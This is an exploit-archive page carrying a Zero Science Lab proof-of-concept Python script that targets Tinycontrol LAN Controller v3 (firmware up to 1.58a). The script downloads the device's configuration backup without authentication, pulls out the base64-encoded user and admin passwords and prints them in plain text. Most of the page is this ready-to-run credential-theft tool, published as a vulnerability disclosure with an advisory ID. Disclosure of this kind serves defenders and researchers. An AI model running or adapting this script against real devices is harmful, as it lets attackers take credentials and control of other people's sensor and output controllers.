exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Tinycontrol LAN Controller 3 Remote Credential Extraction

Tinycontrol LAN Controller 3 Remote Credential Extraction
Posted Sep 2, 2023
Authored by LiquidWorm | Site zeroscience.mk

Tinycontrol LAN Controller version 3 suffers from an issue where an unauthenticated attacker can retrieve the controller's configuration backup file and extract sensitive information that can allow him/her/them to bypass security controls and penetrate the system in its entirety.

tags | exploit
SHA-256 | 4010a70611adf3f6b1b2deae4aa257eb13cae334608ce487ca572842a346f924

Tinycontrol LAN Controller 3 Remote Credential Extraction

Change Mirror Download
#!/usr/bin/env python
#
#
# Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC
#
#
# Vendor: Tinycontrol
# Product web page: https://www.tinycontrol.pl
# Affected version: <=1.58a, HW 3.8
#
# Summary: Lan Controller is a very universal
# device that allows you to connect many different
# sensors and remotely view their readings and
# remotely control various types of outputs.
# It is also possible to combine both functions
# into an automatic if -> this with a calendar
# when -> then. The device provides a user interface
# in the form of a web page. The website presents
# readings of various types of sensors: temperature,
# humidity, pressure, voltage, current. It also
# allows you to configure the device, incl. event
# setting and controlling up to 10 outputs. Thanks
# to the support of many protocols, it is possible
# to operate from smartphones, collect and observ
# the results on the server, as well as cooperation
# with other I/O systems based on TCP/IP and Modbus.
#
# Desc: An unauthenticated attacker can retrieve the
# controller's configuration backup file and extract
# sensitive information that can allow him/her/them
# to bypass security controls and penetrate the system
# in its entirety.
#
# Tested on: lwIP
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5786
# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php
#
#
# 18.08.2023
#
#


import subprocess
import requests
import base64
import sys

binb = "lk3_settings.bin"
outf = "lk3_settings.enc"
bpatt = "0upassword"
epatt = "pool.ntp.org"
startf = False
endf = False
extral = []

print("""
O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O
| |
| Tinycontrol LK3 1.58 Settings DL |
| ZSL-2023-5786 |
| 2023 (c) Zero Science Lab |
| |
|`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|
| |
""")

if len(sys.argv) != 2:
print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0]))
exit(-0)
else:
rhost=sys.argv[1]
if not "http" in rhost:
rhost="http://{}".format(rhost)

try:
resp = requests.get(rhost + "/" + binb)
if resp.status_code == 200:
with open(outf, 'wb') as f:
f.write(resp.content)
print(f"[*] Got data as {outf}")
else:
print(f"[!] Backup failed. Status code: {resp.status_code}")
except Exception as e:
print("[!] Error:", str(e))
exit(-1)

binf = outf
sout = subprocess.check_output(["strings", binf], universal_newlines = True)
linea = sout.split("\n")

for thricer in linea:
if bpatt in thricer:
startf = True
elif epatt in thricer:
endf = True
elif startf and not endf:
extral.append(thricer)

if len(extral) >= 4:
userl = extral[1].strip()
adminl = extral[3].strip()
try:
decuser = base64.b64decode(userl).decode("utf-8")
decadmin = base64.b64decode(adminl).decode("utf-8")
print("[+] User password:", decuser)
print("[+] Admin password:", decadmin)
except Exception as e:
print("[!] Error decoding:", str(e))
else:
print("[!] Regex failed.")
exit(-2)
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close